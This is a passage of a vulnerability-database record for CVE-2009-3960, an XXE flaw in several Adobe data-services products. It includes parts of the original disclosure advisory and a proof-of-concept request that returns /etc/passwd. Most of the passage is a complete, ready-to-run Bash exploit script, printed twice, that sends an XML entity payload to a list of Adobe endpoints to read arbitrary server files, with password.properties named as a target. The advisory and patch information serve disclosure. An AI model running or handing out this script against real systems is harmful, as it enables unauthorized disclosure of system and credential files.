\n{server.name}:{server.port}/ \n{context.root}/flex2gateway/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n4. Adobe LiveCycle ES2 \nWindows XP SP2 / IBM Websphere 7.0 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n \nThe vendor has released several patches for this \nvulnerability. See the Solution section of this \ndocument for more information. \n \n \n+--------+ \n|Solution| \n+--------+ \n \nSecurity-Assessment.com follows responsible \ndisclosure and promptly contacted the vendor after \ndiscovering the issues. The vendor was contacted on \nthe 6th November 2009 and a reply was received on the \nsame day. The vendor released security patches on \nthe 11th February 2010. \n \nThe security patches can be downloaded at the \nfollowing website: \n \nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html \n \n \n+------+ \n|Credit| \n+------+ \n \nDiscovered and advised to Adobe in \nNovember 2009 by Roberto Suggi Liverani of Security- \nAssessment.com. Personal Page: http://malerisch.net/ \n \nFor full details regarding this vulnerability \ndownload the PDF from our website: \n \nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf \n \n \n+---------+ \n|Greetings| \n+---------+ \n \nBug found at Hack in The Sun 2009, Waiheke Island. \n \n \n+-----------------------------+ \n|About Security-Assessment.com| \n+-----------------------------+ \n \nSecurity-Assessment.com is a New Zealand based world \nleader in web application testing, network security \nand penetration testing. Security-Assessment.com \nservices organisations across New Zealand, Australia, \nAsia Pacific, the United States and the United \nKingdom. \n \nRoberto Suggi Liverani \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/86558/adobexml-injection.txt"}, {"lastseen": "2017-04-11T23:24:40", "bulletinFamily": "exploit", "description": "", "modified": "2017-04-11T00:00:00", "published": "2017-04-11T00:00:00", "href": "https://packetstormsecurity.com/files/142096/Adobe-XML-Injection-File-Content-Disclosure.html", "id": "PACKETSTORM:142096", "type": "packetstorm", "title": "Adobe XML Injection File Content Disclosure", "sourceData": "`#!/bin/bash \n# \n# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh \n# Exploit Title: Adobe XML Injection file content disclosure \n# Date: 07-04-2017 \n# Exploit Author: Thomas Sluyter \n# Website: https://www.kilala.nl \n# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html \n# Version: Multiple Adobe products \n# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise \n# CVE : 2009-3960 \n# \n# Shell script that let's you exploit a known XML injection vulnerability \n# in a number of Adobe products, allowing you to read files that are otherwise \n# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject \n# This script is a Bash implementation of the PoC multiple/dos/11529.txt. \n# \n# According to the original Metasploit code, this attack works with: \n# \"Multiple Adobe Products: BlazeDS 3.2 and earlier versions, \n# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, \n# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\" \n# \n \n \nPROGNAME=\"$(basename $0)\" # This script \nTIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles \nSCRATCHFILE=\"/tmp/${PROGNAME}.${TIMESTAMP}\" # Used as generic scratchfile \nEXITCODE=\"0\" # Assume success, changes on errors \nCURL=\"/usr/bin/curl\" # Other locations are detected with \"which\" \n \nSSL=\"0\" # Overridden by -s \nDEBUG=\"0\" # Overridden by -d \nBREAKFOUND=\"0\" # Overridden by -b \nTARGETHOST=\"\" # Overridden by -h \nTARGETPORT=\"8400\" # Overridden by -p \nREADFILE=\"/etc/passwd\" # Overridden by -f \n \n \n################################## OVERHEAD SECTION \n# \n# Various functions for overhead purposes. \n# \n \n# Defining our own logger function, so we can switch between stdout and syslog. \nlogger() { \nLEVEL=\"$1\" \nMESSAGE=\"$2\" \n \n# You may switch the following two, if you need to log to syslog. \n#[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || /usr/bin/logger -p ${LEVEL} \"$MESSAGE\" \n[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || echo \"${LEVEL} $MESSAGE\" \n} \n \n \nExitCleanup() { \nEXITCODE=${1} \nrm -f ${SCRATCHFILE}* >/dev/null 2>&1 \necho \"\" \nexit ${EXITCODE} \n} \n \n \n# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script \nValidIP() { \nlocal IP=${1} \nlocal STAT=1 \n \nif [[ ${IP} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]] \nthen \nOIFS=$IFS; IFS='.' \nIP=(${IP}) \nIFS=$OIFS \n[[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]] \nstat=$? \nfi \nreturn $stat \n} \n \n \n# Function to output help information. \nshow-help() { \necho \"\" \ncat << EOF \n${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file] \n \n-? Show this help message. \n-d Debug mode, outputs more kruft on stdout. \n-s Use SSL / HTTPS, instead of HTTP. \n-b Break on the first valid answer found. \n-h Target host \n-p Target port, defaults to 8400. \n-f Full path to file to grab, defaults to /etc/passwd. \n \nThis script exploits a known vulnerability in a set of Adobe applications. Using one \nof a few possible URLs on the target host (-h) we attempt to read a file (-f) that is \nnormally inaccessible. \n \nNOTE: Windows paths use \\\\, so be sure to properly escape them when using -f! For example: \n${PROGNAME} -h 192.168.1.20 -f c:\\\\\\\\coldfusion8\\\\\\\\lib\\\\\\\\password.properties \n${PROGNAME} -h 192.168.1.20 -f 'c:\\\\coldfusion8\\\\lib\\\\password.properties' \n \nThis script relies on CURL, so please have it in your PATH. \n \nEOF \n} \n \n \n# Parsing and verifying the passed parameters. \nOPTIND=1 \nwhile getopts \"?dsbh:p:f:\" opt; do \ncase \"$opt\" in \n\\?) show-help; ExitCleanup 0 ;; \nd) DEBUG=\"1\" ;; \ns) SSL=\"1\" ;; \nb) BREAKFOUND=\"1\" ;; \nh) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) \nValidIP ${OPTARG}; if [[ $? -eq 0 ]] \nthen TARGETHOST=${OPTARG} \nelse TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}') \n[[ $? -gt 0 ]] && (logger ERROR \"Target host ${TARGETHOST} not found in DNS.\"; ExitCleanup 1) \nfi ;; \np) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) \nif [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]] \nthen logger ERROR \"Target port ${OPTARG} is incorrect.\"; ExitCleanup 1 \nelse TARGETPORT=${OPTARG} \nfi ;; \nf) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) \nif [[ (-z $(echo ${OPTARG} | grep ^\\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]] \nthen logger ERROR \"File is NOT specified with full Unix or Windows path.\"; ExitCleanup 1 \nelse READFILE=${OPTARG} \nfi ;; \n*) show-help; ExitCleanup 0 ;; \nesac \ndone \n \n[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR \"CURL was not found.\"; ExitCleanup 1) \n[[ -z ${TARGETHOST} ]] && (logger ERROR \"Target host was not set.\"; ExitCleanup 1) \n \n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}.\" \n \n \n################################## GETTING TO WORK \n# \n# \n \nPATHLIST=(\"/flex2gateway/\" \"/flex2gateway/http\" \"/flex2gateway/httpsecure\" \\ \n\"/flex2gateway/cfamfpolling\" \"/flex2gateway/amf\" \"/flex2gateway/amfpolling\" \\ \n\"/messagebroker/http\" \"/messagebroker/httpsecure\" \"/blazeds/messagebroker/http\" \\ \n\"/blazeds/messagebroker/httpsecure\" \"/samples/messagebroker/http\" \\ \n\"/samples/messagebroker/httpsecure\" \"/lcds/messagebroker/http\" \\ \n\"/lcds/messagebroker/httpsecure\" \"/lcds-samples/messagebroker/http\" \\ \n\"/lcds-samples/messagebroker/httpsecure\") \n \necho \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\" > ${SCRATCHFILE} \necho \"<!DOCTYPE test [ <!ENTITY x3 SYSTEM \\\"${READFILE}\\\"> ]>\" >> ${SCRATCHFILE} \necho \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\" >> ${SCRATCHFILE} \necho \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\" >> ${SCRATCHFILE} \necho \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\" >> ${SCRATCHFILE} \necho \"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\" >> ${SCRATCHFILE} \necho \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\" >> ${SCRATCHFILE} \necho \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\" >> ${SCRATCHFILE} \necho \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\" >> ${SCRATCHFILE} \n \nif [[ ${DEBUG} -gt 0 ]] \nthen \nlogger DEBUG \"XML file sent to target host reads as follows:\" \necho \"======================================\" \ncat ${SCRATCHFILE} \necho \"======================================\" \necho \"\" \nfi \n \nlet CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1 \n \nfor ADOBEPATH in \"${PATHLIST[@]}\" \ndo \n[[ ${SSL} -gt 0 ]] && PROTOCOL=\"https\" || PROTOCOL=\"http\" \nURI=\"${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}\" \n \n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with URI: ${URI}\" \n \n# Header contents based on a tcpdump capture of original exploit being \n# run from Metasploit. \nHEADER=\"-H \\\"Host: ${TARGETHOST}\\\" -H \\\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\\" -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -H \\\"Content-Length: ${CONTENTLENGTH}\\\"\" \n \nCURLPOST=\"${CURL} -X POST -k -s --http1.1 ${HEADER} -w \\\"%{http_code}\\\" -d @- ${URI}\" \n \n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Using this CURL command: ${CURLPOST}\" \n \n# The tr command dikes out any non-ASCII characters which might mess with output. \nCURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\\11\\12\\15\\40-\\176' 2>&1) \n \n# Output is pretty garbled and the HTTP return code is enclosed in double quotes. \n# I need to grab the last 5 chars (includes NULL EOF) and remove the \". \nCURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:]) \n \nif [[ ${DEBUG} -gt 0 ]] \nthen \nlogger DEBUG \"CURL was given this HTTP return code: ${CURLCODE}.\" \nlogger DEBUG \"Output from CURL reads as follows:\" \necho \"======================================\" \necho \"${CURLOUTPUT}\" \necho \"======================================\" \necho \"\" \nfi \n \nlogger INFO \"${CURLCODE} for ${URI}\" \n \nif [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep \"<?xml version=\")) ]] \nthen \necho \"Read from ${URI}:\" \necho \"${CURLOUTPUT}\" | sed 's/^[^<]*</</' \n[[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0 \nfi \n \nif [[ ${DEBUG} -gt 0 ]] \nthen \necho -e \"\\nReady to continue with the next URI? [y/n]: \\c\" \nread READY \ncase ${READY} in \ny|Y|yes) logger DEBUG \"Moving to next URI.\"; echo \"\" ;; \n*) logger DEBUG \"Aborting...\"; ExitCleanup 1 ;; \nesac \nfi \ndone \n \n \nExitCleanup 0 \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142096/adobe-inject.txt"}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "File disclosure vulnerability\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-02-01T00:00:00", "id": "E-1", "href": "", "type": "dsquare", "title": "Adobe XML External Entity File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-20T00:14:06", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2017-04-11T00:00:00", "published": "2017-04-11T00:00:00", "href": "https://0day.today/exploit/description/27568", "id": "1337DAY-ID-27568", "title": "Adobe Multiple Products - XML Injection File Content Disclosure Exploit", "type": "zdt", "sourceData": "#!/bin/bash\r\n#\r\n# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh\r\n# Exploit Title: Adobe XML Injection file content disclosure\r\n# Date: 07-04-2017\r\n# Exploit Author: Thomas Sluyter\r\n# Website: https://www.kilala.nl\r\n# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n# Version: Multiple Adobe products\r\n# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise\r\n# CVE : 2009-3960\r\n#\r\n# Shell script that let's you exploit a known XML injection vulnerability\r\n# in a number of Adobe products, allowing you to read files that are otherwise\r\n# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject\r\n# This script is a Bash implementation of the PoC multiple/dos/11529.txt.\r\n#\r\n# According to the original Metasploit code, this attack works with:\r\n# \"Multiple Adobe Products: BlazeDS 3.2 and earlier versions, \r\n# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1,\r\n# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\"\r\n#\r\n \r\n \r\nPROGNAME=\"$(basename $0)\" # This script\r\nTIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles\r\nSCRATCHFILE=\"/tmp/${PROGNAME}.${TIMESTAMP}\" # Used as generic scratchfile\r\nEXITCODE=\"0\" # Assume success, changes on errors\r\nCURL=\"/usr/bin/curl\" # Other locations are detected with \"which\"\r\n \r\nSSL=\"0\" # Overridden by -s\r\nDEBUG=\"0\" # Overridden by -d\r\nBREAKFOUND=\"0\" # Overridden by -b\r\nTARGETHOST=\"\" # Overridden by -h\r\nTARGETPORT=\"8400\" # Overridden by -p\r\nREADFILE=\"/etc/passwd\" # Overridden by -f\r\n \r\n \r\n################################## OVERHEAD SECTION \r\n# \r\n# Various functions for overhead purposes.\r\n#\r\n \r\n# Defining our own logger function, so we can switch between stdout and syslog.\r\nlogger() {\r\n LEVEL=\"$1\"\r\n MESSAGE=\"$2\"\r\n \r\n # You may switch the following two, if you need to log to syslog.\r\n #[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || /usr/bin/logger -p ${LEVEL} \"$MESSAGE\"\r\n [[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || echo \"${LEVEL} $MESSAGE\"\r\n}\r\n \r\n \r\nExitCleanup() {\r\n EXITCODE=${1} \r\n rm -f ${SCRATCHFILE}* >/dev/null 2>&1\r\n echo \"\"\r\n exit ${EXITCODE}\r\n}\r\n \r\n \r\n# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script\r\nValidIP() {\r\n local IP=${1}\r\n local STAT=1\r\n \r\n if [[ ${IP} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]]\r\n then\r\n OIFS=$IFS; IFS='.'\r\n IP=(${IP})\r\n IFS=$OIFS\r\n [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]]\r\n stat=$?\r\n fi\r\n return $stat\r\n}\r\n \r\n \r\n# Function to output help information.\r\nshow-help() {\r\n echo \"\"\r\n cat << EOF\r\n ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file]\r\n \r\n -? Show this help message.\r\n -d Debug mode, outputs more kruft on stdout.\r\n -s Use SSL / HTTPS, instead of HTTP.\r\n -b Break on the first valid answer found.\r\n -h Target host\r\n -p Target port, defaults to 8400.\r\n -f Full path to file to grab, defaults to /etc/passwd.\r\n \r\n This script exploits a known vulnerability in a set of Adobe applications. Using one \r\n of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is\r\n normally inaccessible. \r\n \r\n NOTE: Windows paths use \\\\, so be sure to properly escape them when using -f! For example:\r\n ${PROGNAME} -h 192.168.1.20 -f c:\\\\\\\\coldfusion8\\\\\\\\lib\\\\\\\\password.properties\r\n ${PROGNAME} -h 192.168.1.20 -f 'c:\\\\coldfusion8\\\\lib\\\\password.properties'\r\n \r\n This script relies on CURL, so please have it in your PATH. \r\n \r\nEOF\r\n}\r\n \r\n \r\n# Parsing and verifying the passed parameters.\r\nOPTIND=1 \r\nwhile getopts \"?dsbh:p:f:\" opt; do\r\n case \"$opt\" in\r\n \\?) show-help; ExitCleanup 0 ;;\r\n d) DEBUG=\"1\" ;;\r\n s) SSL=\"1\" ;;\r\n b) BREAKFOUND=\"1\" ;;\r\n h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n ValidIP ${OPTARG}; if [[ $? -eq 0 ]]\r\n then TARGETHOST=${OPTARG}\r\n else TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}')\r\n [[ $? -gt 0 ]] && (logger ERROR \"Target host ${TARGETHOST} not found in DNS.\"; ExitCleanup 1)\r\n fi ;;\r\n p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n if [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]]\r\n then logger ERROR \"Target port ${OPTARG} is incorrect.\"; ExitCleanup 1\r\n else TARGETPORT=${OPTARG}\r\n fi ;;\r\n f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n if [[ (-z $(echo ${OPTARG} | grep ^\\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]]\r\n then logger ERROR \"File is NOT specified with full Unix or Windows path.\"; ExitCleanup 1\r\n else READFILE=${OPTARG}\r\n fi ;;\r\n *) show-help; ExitCleanup 0 ;;\r\n esac\r\ndone\r\n \r\n[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR \"CURL was not found.\"; ExitCleanup 1)\r\n[[ -z ${TARGETHOST} ]] && (logger ERROR \"Target host was not set.\"; ExitCleanup 1)\r\n \r\n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}.\"\r\n \r\n \r\n################################## GETTING TO WORK\r\n# \r\n#\r\n \r\nPATHLIST=(\"/flex2gateway/\" \"/flex2gateway/http\" \"/flex2gateway/httpsecure\" \\\r\n \"/flex2gateway/cfamfpolling\" \"/flex2gateway/amf\" \"/flex2gateway/amfpolling\" \\\r\n \"/messagebroker/http\" \"/messagebroker/httpsecure\" \"/blazeds/messagebroker/http\" \\\r\n \"/blazeds/messagebroker/httpsecure\" \"/samples/messagebroker/http\" \\\r\n \"/samples/messagebroker/httpsecure\" \"/lcds/messagebroker/http\" \\\r\n \"/lcds/messagebroker/httpsecure\" \"/lcds-samples/messagebroker/http\" \\\r\n \"/lcds-samples/messagebroker/httpsecure\")\r\n \r\necho \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\" > ${SCRATCHFILE}\r\necho \"<!DOCTYPE test [ <!ENTITY x3 SYSTEM \\\"${READFILE}\\\"> ]>\" >> ${SCRATCHFILE}\r\necho \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\" >> ${SCRATCHFILE}\r\necho \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\" >> ${SCRATCHFILE}\r\necho \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\" >> ${SCRATCHFILE}\r\necho \"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\" >> ${SCRATCHFILE}\r\necho \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\" >> ${SCRATCHFILE}\r\necho \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\" >> ${SCRATCHFILE}\r\necho \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\" >> ${SCRATCHFILE}\r\n \r\nif [[ ${DEBUG} -gt 0 ]] \r\nthen\r\n logger DEBUG \"XML file sent to target host reads as follows:\"\r\n echo \"======================================\"\r\n cat ${SCRATCHFILE}\r\n echo \"======================================\"\r\n echo \"\"\r\nfi\r\n \r\nlet CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1\r\n \r\nfor ADOBEPATH in \"${PATHLIST[@]}\"\r\ndo\r\n [[ ${SSL} -gt 0 ]] && PROTOCOL=\"https\" || PROTOCOL=\"http\"\r\n URI=\"${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}\"\r\n \r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with URI: ${URI}\"\r\n \r\n # Header contents based on a tcpdump capture of original exploit being\r\n # run from Metasploit.\r\n HEADER=\"-H \\\"Host: ${TARGETHOST}\\\" -H \\\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\\" -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -H \\\"Content-Length: ${CONTENTLENGTH}\\\"\"\r\n \r\n CURLPOST=\"${CURL} -X POST -k -s --http1.1 ${HEADER} -w \\\"%{http_code}\\\" -d @- ${URI}\"\r\n \r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Using this CURL command: ${CURLPOST}\"\r\n \r\n # The tr command dikes out any non-ASCII characters which might mess with output.\r\n CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\\11\\12\\15\\40-\\176' 2>&1)\r\n \r\n # Output is pretty garbled and the HTTP return code is enclosed in double quotes.\r\n # I need to grab the last 5 chars (includes NULL EOF) and remove the \".\r\n CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:])\r\n \r\n if [[ ${DEBUG} -gt 0 ]] \r\n then\r\n logger DEBUG \"CURL was given this HTTP return code: ${CURLCODE}.\"\r\n logger DEBUG \"Output from CURL reads as follows:\"\r\n echo \"======================================\"\r\n echo \"${CURLOUTPUT}\"\r\n echo \"======================================\"\r\n echo \"\"\r\n fi\r\n \r\n logger INFO \"${CURLCODE} for ${URI}\"\r\n \r\n if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep \"<?xml version=\")) ]] \r\n then\r\n echo \"Read from ${URI}:\"\r\n echo \"${CURLOUTPUT}\" | sed 's/^[^<]*</</'\r\n [[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0\r\n fi\r\n \r\n if [[ ${DEBUG} -gt 0 ]] \r\n then\r\n echo -e \"\\nReady to continue with the next URI? [y/n]: \\c\"\r\n read READY\r\n case ${READY} in\r\n y|Y|yes) logger DEBUG \"Moving to next URI.\"; echo \"\" ;;\r\n *) logger DEBUG \"Aborting...\"; ExitCleanup 1 ;;\r\n esac\r\n fi\r\ndone\r\n \r\n \r\nExitCleanup 0\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/27568"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "\r\n ( , ) (,\r\n . `.' ) ('. ',\r\n ). , ('. ( ) (\r\n (_,) .`), ) _ _,\r\n / _____/ / _ \ ____ ____ _____ \r\n \____ \==/ /_\ \ _/ ___\/ _ \ / \ \r\n / \/ | \\ \__( <_> ) Y Y \\r\n/______ /\___|__ / \___ >____/|__|_| /\r\n \/ \/.-. \/ \/:wq \r\n (x.0)\r\n '=.|w|.='\r\n _='`"``=.\r\n\r\n presents..\r\n\r\nMultiple Adobe Products\r\nXML External Entity And XML Injection Vulnerabilities\r\n\r\nCVE: CVE-2009-3960\r\nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n+-----------+\r\n|Description|\r\n+-----------+\r\n\r\nSecurity-Assessment.com discovered that multiple Adobe \r\nproducts with different Data Services versions are \r\nvulnerable to XML External Entity (XXE) and XML \r\ninjection attacks. \r\nXML external Entities injection allows a wide range of\r\nXML based attacks, including local file disclosure, \r\nTCP scans and Denial of Service condition, which can \r\nbe achieved by recursive entity injection, attribute \r\nblow up and other types of injection. \r\nFor more information about the implications associated\r\nto this vulnerability, refer to the RFC2518 (17.7 \r\nImplications of XML External Entities): \r\nhttp://www.ietf.org/rfc/rfc2518.txt\r\n\r\n+--------------+\r\n|Product Review|\r\n+--------------+\r\n\r\nAdobe Data Services components provide Flex/RIA \r\napplications with data messaging, remoting and \r\nmanagement capabilities.\r\n\r\nThe discovered vulnerabilities affect the HTTPChannel\r\n servlet classes which are respectively \r\n\u201cmx.messaging.channels.HTTPChannel\u201d and \r\n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These \r\nclasses are part of the Data Services Messaging \r\nclasses and can be found in the \r\nflex-messaging-common.jar Java archive.\r\n\r\nThe HTTPChannel transports data in the AMFX format, \r\nwhich is the text-based XML representation of AMF. \r\nThe HTTPChannel endpoints are defined in the \r\nservices-config.xml file, located within the \r\nFlex/WEB-INF folder of the application. \r\nBy default, the HTTPChannel classes are mapped to \r\nthe following endpoints:\r\n\r\n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http\r\n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure\r\n\r\nNote that the HTTPChannel may be mapped to different \r\nendpoints. \r\nThis depends on the deployed application and the \r\nframework in use (e.g. BlazeDS, Adobe LiveCycle \r\nData Services, etc.).\r\n\r\n+--------------------------------------------+\r\n|Exploitation - XML External Entity Injection|\r\n+--------------------------------------------+\r\n\r\nXML entities can be declared and included within AMFX\r\nrequests passed to the HTTPChannel. The XML parser \r\nparses the payload and successfully processes \r\ninjected entities.\r\n\r\nThe following table shows an example of XML external\r\nentity injection which leads to local file disclosure.\r\nThe AMFX request is sent via the HTTPChannel endpoint\r\nin BlazeDS.\r\n\r\nXML External Entity Injection \u2013 Local File Disclosure\r\nPoC \u2013 BlazeDS \u2013 Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>\r\n<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">\r\n <body>\r\n <object type="flex.messaging.messages.CommandMessage">\r\n <traits>\r\n <string>body</string><string>clientId</string><string>correlationId</string>\r\n <string>destination</string><string>headers</string><string>messageId</string>\r\n <string>operation</string><string>timestamp</string><string>timeToLive</string>\r\n </traits><object><traits />\r\n </object>\r\n <null /><string /><string />\r\n <object>\r\n <traits>\r\n <string>DSId</string><string>DSMessagingVersion</string>\r\n </traits>\r\n <string>nil</string><int>1</int>\r\n </object>\r\n <string>&x3;</string>\r\n<int>5</int><int>0</int><int>0</int>\r\n </object>\r\n </body>\r\n</amfx>\r\n\r\n\r\nXML External Entity Injection \u2013 Local File Inclusion\r\nPoC \u2013 BlazeDS \u2013 Response\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">\r\n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>\r\n<body targetURI="/onResult" responseURI="">\r\n<object type="flex.messaging.messages.AcknowledgeMessage">\r\n<traits><string>timestamp</string><string>headers</string>\r\n<string>body</string><string>correlationId</string>\r\n<string>messageId</string><string>timeToLive</string>\r\n<string>clientId</string><string>destination</string>\r\n</traits><double>1.257387140632E12</double><object>\r\n<traits><string>DSMessagingVersion</string>\r\n<string>DSId</string></traits><double>1.0</double>\r\n<string>BDE929FE-270D-3B56-1061-616E8B938429</string>\r\n</object><null/><string>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\n[...]\r\n\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint 